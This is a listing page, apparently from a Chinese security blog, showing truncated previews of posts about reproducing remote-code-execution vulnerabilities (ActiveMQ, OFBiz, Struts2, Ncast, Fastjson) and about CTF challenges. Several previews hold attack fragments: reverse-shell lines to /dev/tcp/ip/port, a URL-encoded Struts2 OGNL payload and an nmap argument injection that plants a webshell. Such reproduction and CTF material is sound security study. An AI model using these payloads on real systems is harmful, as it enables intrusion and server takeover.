rce

Ncast盈可视高清智能录播系统busiFacade RCE漏洞(CVE-2024-0305)

产品介绍Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统,旨在提供高质量,高清定制的录播功能。漏洞描述广州盈可视电子科技有限公司的高清智能录播系统存在信息泄露漏洞(CVE-2024-0305),攻击者可通过该漏洞,利用访客身份未授权访问/manage/IPSetup.php后台功能模块,使用网络诊断功能模块可实现未授权远程命令执行,导致服务器失陷被控。资产测绘app=“Ncast-
keepb1ue·2024-01-13 19:20

nssctf round#4

参考:[NSSRound#4]复现_ThnPkm的博客-CSDN博客目录webez_rce1zweb1zweb(revenge)(1)正确思路但结果不合预期(2)进行解决的各种尝试与思考MiscSingin
葫芦娃42·2024-01-13 18:44

NSSCTF Round#7 Team ez_rce和0o0讲解

ez_rce刚看到差点被这个被这个吓到,还以为第一题就是java安全,仔细一看就是运行了一个jar文件,然后我们可以自定义action和data的值,这里就可以用到||这个了,||旁边两个都可以执行的,
练习两年半的篮球选..哦不对安全选手·2024-01-13 18:10

【Web】NSSCTF Round#16 Basic个人wp(全)

目录①RCE但是没有完全RCE②了解过PHP特性吗①RCE但是没有完全RCE上来就是一段md5八股(string)就是不让用数组了,然后强比较需要md5碰撞?
Z3r4y·2024-01-13 18:37

Apache ActiveMQ RCE漏洞复现

ApacheActiveMQRCE漏洞复现1、产品简介ActiveMQ是一种开源的基于JMS(JavaMessageServie)规范的一种消息中间件的实现,ActiveMQ的设计目标是提供标准的,面向消息的,能够跨越多语言和多系统的应用集成消息通信中间件。ActiveMQ是Apache出品,最流行的,能力强劲的开源消息总线。2、漏洞概述ApacheActiveMQ中存在远程代码执行漏洞,Apac
别JUAN我·2024-01-13 10:52

【复现】Spider-Flow RCE漏洞(CVE-2024-0195)_16

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述SpiderFlow是一个高度灵活可配置的爬虫平台,用户无需编写代码,以流程图的方式,即可实现爬虫。该工具支持多数据源、自动保存至数据库、任务监控、抓取JS动态渲染页面、插件扩展(OCR识别、邮件发送)等功能。二.漏洞影响通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。继承Web服务
穿着白衣·2024-01-12 20:19

BUUCTF刷题记录

host='-oGhack.php'把这串东西拼接到靶场地址后面,蚁剑链接http://靶场地址/沙箱地址/hack.php蚁剑链接flag在根目录下直接RCE:?
块块0.o·2024-01-12 12:45

Apache Ofbiz XML-RPC RCE漏洞复现(CVE-2023-49070)

0x01产品简介ApacheOFBiz是一个开源的企业资源规划(ERP)系统,提供了多种商业功能和模块。0x02漏洞概述漏洞成因2020年,为修复CVE-2020-9496增加权限校验,存在绕过。2021年,增加Filter用于拦截XML-RPC中的恶意请求,存在绕过。2023年四月,彻底删除xmlrpchandler以避免同类型的漏洞产生。尽管主分支在四月份已经移除了XML-RPC组件,但在Ap
OidBoy_G·2024-01-12 06:13

漏洞复现--Apache Ofbiz XML-RPC RCE(CVE-2023-49070)

免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责一:漏洞描述近日,亚信安全CERT监控到ApacheOFBiz发布更新公告,修复了ApacheOFBiz中的一个未授
芝士土包鼠·2024-01-12 06:13

Ncast盈可视 高清智能录播系统 IPSetup.php信息泄露+RCE漏洞复现(CVE-2024-0305)

0x01产品简介Ncast盈可视高清智能录播系统是广州盈可视电子科技有限公司一种先进的音视频录制和播放解决方案,旨在提供高质量、高清定制的录播体验。该系统采用先进的摄像和音频技术,结合强大的软件平台,可以实现高清视频录制、多路音频采集、实时切换和混音、定制视频分析等功能。0x02漏洞概述广州盈可视电子科技有限公司高清智能录播系统可通过访客身份未授权访问/manage/IPSetup.php后台功能
OidBoy_G·2024-01-12 01:27

K8S后渗透横向节点与持久化隐蔽方式探索

前言通常在红蓝对抗中,我们可能会通过各种方法如弱口令、sql注入、web应用漏洞导致的RCE等方法获得服务器的权限;在当前云原生迅猛发展的时代,这台服务器很可能是一个容器,在后续的后渗透由传统的提权变为容器逃逸
杭州默安科技·2024-01-11 19:31

Apache ActiveMQ RCE CNVD-2023-69477 CVE-2023-46604

漏洞简介ApacheActiveMQ官方发布新版本,修复了一个远程代码执行漏洞,攻击者可构造恶意请求通过ApacheActiveMQ的61616端口发送恶意数据导致远程代码执行,从而完全控制ApacheActiveMQ服务器。影响版本Apache ActiveMQ 5.18.0 before 5.18.3Apache ActiveMQ 5.17.0 before 5.17.6Apache Acti
合天网安实验室·2024-01-11 10:47

Apache ActiveMQ RCE漏洞复现

ApacheActiveMQRCE漏洞复现(CNVD-2023-69477)1、漏洞版本ApacheActiveMQpingne5q0v.dnslog.cn反弹shell的poc.xmlbash-c&/dev/tcp/ip/端口0>&1]]>3、复现过程1、在本地含有poc.xml的文件夹下开启http服务python-mhttp.server#默认端口为8000可以正常访问即为开启成功2、通过A
知鱼~·2024-01-11 07:09

Apache ActiveMQ RCE CNVD-2023-69477 CVE-2023-46604

漏洞简介ApacheActiveMQ官方发布新版本,修复了一个远程代码执行漏洞,攻击者可构造恶意请求通过ApacheActiveMQ的61616端口发送恶意数据导致远程代码执行,从而完全控制ApacheActiveMQ服务器。影响版本Apache ActiveMQ 5.18.0 before 5.18.3Apache ActiveMQ 5.17.0 before 5.17.6Apache Acti
蚁景网络安全·2024-01-11 07:09

Spring Cloud Function SpEL注入漏洞(CVE-2022-22963)分析

Spring是一种流行的开源Java框架,该漏洞与另一个相关的远程代码执行(RCE)漏洞(SpringCore,即“Spring4Shell”)均可通过AkamaiAdaptiveSecurityEngine
Akamai中国·2024-01-11 06:29

[漏洞复现]Apache Struts2/S2-012 RCE(CVE-2013-1965)

一、漏洞情况分析ApacheStrutsShowcaseApp2.0.0到2.3.13(在2.3.14.3之前的Struts2中使用)允许远程攻击者通过在调用重定向时未正确处理的精心设计的参数名称执行任意OGNL代码。二、漏洞复现春秋云境.com一键梭哈,复制粘贴直接拿下name=%25%7B%28%23cmd%3D%27bash+-i+%3E%26+%2Fdev%2Ftcp%2Fip%2Fpor
free key·2024-01-10 18:52

全版本Windows RCE漏洞复现CVE-2023-36025

漏洞简介CVE-2023-36025是微软于11月补丁日发布的安全更新中修复WindowsSmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过WindowsDefenderSmartScreen检查及其相关提示。该漏洞的攻击复杂性较低,可创建并诱导用户点击恶意设计的Internet快捷方式文件(.URL)或指
网安老伯·2024-01-10 16:18

Cacti 监控工具 | 因严重 SQL 注入漏洞而受到攻击

攻击者可以利用该问题访问Cacti数据库中的所有数据;并且,当与先前的漏洞链接时,它会启用RCE
网安老伯·2024-01-10 16:45

HackTheBox - Medium - Linux - Awkward

AwkwardAwkward是一款中等难度的机器,它突出显示了不会导致RCE的代码注入漏洞,而是SSRF、LFI和任意文件写入/追加漏洞。
Sugobet·2024-01-10 01:19

Apache SSI 远程命令执行漏洞

ApacheSSI远程命令执行漏洞1.cd到ssi-rcecd/opt/vulhub/httpd/ssi-rce/2.执行docker-composeup-ddocker-composeup-d3.查看靶场是否开启成功
爱喝水的泡泡·2024-01-09 07:49

Polar靶场 wu

记录一道取反绕过RCE的题,很无语(我发现这个靶场的题都很坑)先看源码一眼看去就是无字母数字RCE,有很多方法绕过,比如字符累加拼接,异或绕过,取反绕过等我一开始用的是字符累加拼接的方法payload如下
来君悦(xiaolaisec)·2024-01-09 01:29

天融信TOPSEC Cookie 远程命令执行漏洞复现

该系统Cookie处存在RCE漏洞,会导致服务器失陷。二、漏洞环境搭建
故事讲予风听·2024-01-08 19:43

dedecms v5.8 未授权RCE 漏洞

在这篇博文中,我将分享对Dedecms(或翻译成英文的“ChasingaDream”CMS)的技术评论,包括它的攻击面以及它与其他应用程序的不同之处。最后,我将结束一个影响v5.8.1预发布的预认证远程代码执行漏洞。这是一款有趣的软件,因为它自最初发布以来已有14年的历史,而且PHP多年来发生了很大变化。对于网上搜索“什么是中国最大的CMS”很快发现,多源的状态是DEDECMS是最流行的。然而,这
白昼小丑·2024-01-08 00:49

漏洞复现--Apache OFBiz groovy RCE(CVE-2023-51467)

免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责一:漏洞描述ApacheOFBiz(ApacheOpenForBusiness)是一个开源的企业资源规划(ERP)系
芝士土包鼠·2024-01-07 21:51

log4j RCE漏洞原理分析及检测

实现原理log4j支持使用表达式的形式打印日志,比如logger.info("systempropety:${sys:user.dir}");问题就在与表达式支持非常多样,其中有一个jndi就是今天的主题logger.info("systempropety:${jndi:schema://url}");jdk将从url指定的路径下载一段字节流,并将其反序列化为Java对象,作为jndi返回。反序列
诺浅·2024-01-06 22:00

CTF特训(一):ctfshow-RCE挑战

CTF特训(一):ctfshow-RCE挑战FLAG:可后来,除了梦以外的地方,我再也没有见过你专研方向:代码审计,PHP每日emo:其实挺迷茫的,不知道该干什么,(骗你的)RCE挑战1代码分析:这段PHP
是liku不是里库·2024-01-06 21:07

虚假的 RCE vs 真实的 RCE

吐槽一下最近外网的macOSFinderRCE。前言前两天看HackerNews的时候发现一条新闻:而这个漏洞的出处更加劲爆,原标题直接就是:SSDAdvisory–macOSFinderRCE。吓得我赶紧点进去看看,发现漏洞原因竟然很简单:在macOS中,点击.netloc后缀的文件可以执行指定命令。netlocnetloc文件本身是一个快捷方式文件,从浏览器中点击网址拖拽到桌面或者Finder
有价值炮灰·2024-01-06 13:18

Struts2 远程代码执行漏洞S2-001分析

自Struts2在2007年爆出第一个远程代码执行漏洞S2-001以来,在其后续的发展过程中不断爆出更多而且危害更大的远程代码执行漏洞,而造成Struts2这么多RCE漏洞的主要原因就是OGNL表达式。
st3pby·2024-01-05 19:14

福建科立讯通信 指挥调度管理平台多处RCE漏洞复现

0x01产品简介福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。0x02漏洞概述福建科立讯通信有限公司指挥调度管理平台vmon
OidBoy_G·2024-01-05 09:38

[UUCTF 2022 新生赛]ez_rce

[UUCTF2022新生赛]ez_rcewp在做这道题时,我参考了这篇博客:https://www.cnblogs.com/bkofyZ/p/17594549.html认识到了自己的一些不足。题目代码如下:';eval($code);}else{die("你想干什么?????????");}}else{echo"居然都不输入参数,可恶!!!!!!!!!";show_source(__FILE__)
妙尽璇机·2024-01-04 11:28

【打靶练习】vulnhub: loly

ip:192.168.1.1092.全端口扫描3.80端口应用访问4.目录扫描5.Web应用为wordpress,根据页面链接,hosts中增加loly.lc6.登录尝试7.扫一下相关插件,没有发现有rce
分等级考试的佛·2024-01-03 18:30

关于蚁剑(AntSword)的溯源反制

中国蚁剑(AntSword)RCE漏洞此漏洞在AntSword2.7.1版本上修复,所以适用于AntSword2.7.1以下版本。
Myon⁶·2024-01-03 13:26

【Hack The Box】windows练习-- love

文章目录HTB学习笔记信息收集我看445smb我看3306我看5080,7680我看https我看5000web我看80web看http://staging.love.htb/再次利用rce提权信息收集
人间体佐菲·2024-01-02 21:44

红队打靶练习:SAR: 1

目录信息收集1、arp2、netdiscover3、nmap4、nikto5、whatweb小结目录探测1、gobuster2、dirsearchWEBCMS1、cms漏洞探索2、RCE漏洞利用提权getuser.txt
真的学不了一点。。。·2024-01-02 07:40

【Web】Ctfshow Thinkphp5 非强制路由RCE漏洞

目录非强制路由RCE漏洞web579web604web605web606web607-610前面审了一些tp3的sql注入,终于到tp5了,要说tp5那最经典的还得是rce下面介绍非强制路由RCE漏洞非强制路由
Z3r4y·2024-01-01 23:09

【复现】Tosei 自助洗衣系统RCE漏洞_05

三.漏洞复现1.漏洞一:(1)漏洞类型:RCE(2)请求类型:POST(3)复现首页响应请求包POST/cgi-bin/network_test.phpHTTP/1.1Host:Use
穿着白衣·2024-01-01 22:06

【复现】Apache OFBiz RCE漏洞(CVE-2023-51467)_03

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一四.修复建议五.搜索语法六.免责声明一.概述ApacheOFBiz不仅是一个产品及订单管理系统,它还提供了一整套功能,涵盖企业所需的方方面面。除了管理产品及其相关内容(如电子商店)外,ApacheOFBiz还能履行许多其它重要角色,包括客户关系管理、项目进度、计费管理、人力资源管理以及订单管理。二.漏洞影响通过提交恶意构造的参数破坏命令语句结构,从而达
穿着白衣·2024-01-01 22:05

Weblogic-CVE-2023-21839

一、漏洞概述RCE漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致OracleWebLogic服务器被接管,通过rmi/ldap远程协议进行远程命令执行
Guess'·2024-01-01 21:38

ctfshow--RCE极限挑战

本周ctfshow的挑战注重点为RCE,主要利用是:自增绕过RCERCE挑战1属于简单类型源码error_reporting(0);highlight_file(__FILE__);$code=$_POST
yb0os1·2024-01-01 17:16

2022HNCTF-web

Week1]Interesting_include分析payload[Week1]easy_upload分析payload[Week1]WhatisWeb分析payload[Week1]Challenge__rce
yb0os1·2024-01-01 17:15

西软云XMS 反序列化RCE漏洞复现

0x01产品简介西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务,助力酒店智能转型升级。0x02漏洞概述西软云XMS/fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,未经身份认证的攻击者可利用此漏洞执行任意代码,获取服务器权限。0x03影响范围所有版本0x04复现
OidBoy_G·2024-01-01 06:10

Apache OFBiz RCE漏洞复现(CVE-2023-51467)

0x01产品简介ApacheOFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。0x02漏洞概述漏洞成因该系统的身份验证机制存在缺陷,可能允许未授权用户通过绕过标准登录流程来获取后台访问权限。此外,在处理特定数据输入时,攻击者可构造恶意请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行漏洞影响未授权访问和潜在
OidBoy_G·2024-01-01 06:08

从0到1浅析Redis服务器反弹Shell那些事

未授权访问反弹Shell2.1Web服务写入Webshell2.2Linux定时任务反弹shell2.3/etc/profile.d->反弹shell2.4写入ssh公钥登录服务器2.5利用Redis主从复制RCE2.6SSRF
Tr0e·2023-12-30 07:39

Fastjson-1.2.24-RCE

一、环境搭建机器:kaliLinuxJava:jdk8python:python3.7.x二、搭建靶机环境在docker里面搭建一个靶机环境看看能不能访问三、构建payload将下列代码放进backshell.javaimportjava.lang.Runtime;importjava.lang.Process;publicclassbackshell{static{try{Runtimert=R
黄公子学安全·2023-12-30 05:10

思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现

产品简介思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机漏洞描述由于思福迪运维安全管理系统test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器资产测绘banner=“Set-Cookie:bhost=”||header=“Set-Cookie:bhost=”漏洞复现POC如下:POST/bhost/t
keepb1ue·2023-12-29 22:30

漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)

目录漏洞简介漏洞复现一.Vulnerablefilereadconfig(易受攻击的文件读取配置)环境搭建漏洞利用二、VulnerableRCEconfig(易受攻击的RCE配置)环境搭建漏洞利用漏洞修复漏洞简介该漏洞是由于
源十三·2023-12-29 13:32

apache-CVE-2021-41773[42013]-漏洞复现

41773影响范围为2.4.49CVE-2021-42013影响范围为2.4.49/50漏洞验证41773和42013在10月份时,被暴出目录穿越和远程命令执行,虽然只影响了apache的49/50版本,但是RCE
csd_ct·2023-12-29 13:30

xxl-job弱口令登录后台RCE复现渗透测试

简介XXL-JOB是一个轻量级分布式任务调度平台,使用JAVA语言研发,使用其可以轻松的实现分布式任务调度,任务管理、执行、监控等功能,在国内颇受欢迎,目前已有多家公司接入xxl-job。任务官方地址中文版:http://www.xuxueli.com/xxl-job漏洞影响xxl-job全版本,获取后台权限可以管理所有的任务管理,甚至可以执行指令,接管服务器。漏洞复现1.登录界面如下使用弱口令登
烽铃子·2023-12-29 07:44

浅析xxl-obj分布式任务调度平台RCE漏洞

文章目录前言本地环境搭建1、初始化数据库2、搭建调度中心3、搭建出执行器XXL-JOB漏洞1、后台弱口令->RCE2、未授权API->RCE3、默认accessToken4、CVE-2022-361575
Tr0e·2023-12-29 07:12

[SWPUCTF 2021 新生赛]finalrce

此外,参考了命令执行(RCE)面对各种过滤,骚姿势绕过总结题目代码:|\<|\%|\$/i',$url)){echo"Sorry,youcan'tusethis.
妙尽璇机·2023-12-28 20:13
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他